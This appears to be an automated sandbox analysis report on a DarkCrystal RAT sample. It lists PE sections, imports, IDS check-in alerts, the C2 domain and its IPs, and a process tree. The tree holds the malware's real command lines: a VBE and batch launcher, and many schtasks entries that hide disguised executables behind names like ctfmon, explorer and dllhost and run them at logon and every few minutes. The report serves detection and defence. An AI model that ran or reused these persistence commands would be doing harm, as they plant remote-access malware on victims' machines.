.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-13T13:26:33.309955+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:44.466245+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49738 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:49.310116+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49739 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:52.200683+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49740 | 104.21.16.1 | 80 | TCP
2025-01-13T13:26:55.607858+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49741 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:13.763281+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49827 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:21.935238+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49880 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:24.482302+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49897 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:28.654062+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49926 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:46.201101+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50012 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:54.216801+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50013 | 104.21.16.1 | 80 | TCP
2025-01-13T13:27:56.763749+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50014 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:02.748384+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50015 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:05.513787+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50016 | 104.21.16.1 | 80 | TCP
2025-01-13T13:28:07.654435+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50017 | 104.21.16.1 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2025 13:26:32.802299023 CET | 62636 | 53 | 192.168.2.4 | 1.1.1.1
Jan 13, 2025 13:26:32.816339016 CET | 53 | 62636 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2025 13:26:32.802299023 CET | 192.168.2.4 | 1.1.1.1 | 0xddc1 | Standard query (0) | 77777cm.nyashtyan.in | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:26:32.816339016 CET | 1.1.1.1 | 192.168.2.4 | 0xddc1 | No error (0) | 77777cm.nyashtyan.in |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false

                                                          Target ID:0
                                                          Start time:07:25:59
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SPISOK_DENEG.exe"
                                                          Imagebase:0xd0000
                                                          File size:1'166'640 bytes
                                                          MD5 hash:490AA1E56FAB47858D780A9FDBAFB5BF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:07:26:00
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe"
                                                          Imagebase:0x910000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"
                                                          Imagebase:0xea0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Imagebase:0xe90000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                                          Imagebase:0x7ff7e9220000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:07:26:09
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:07:26:09
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"
                                                          Imagebase:0x7ff768590000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true
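
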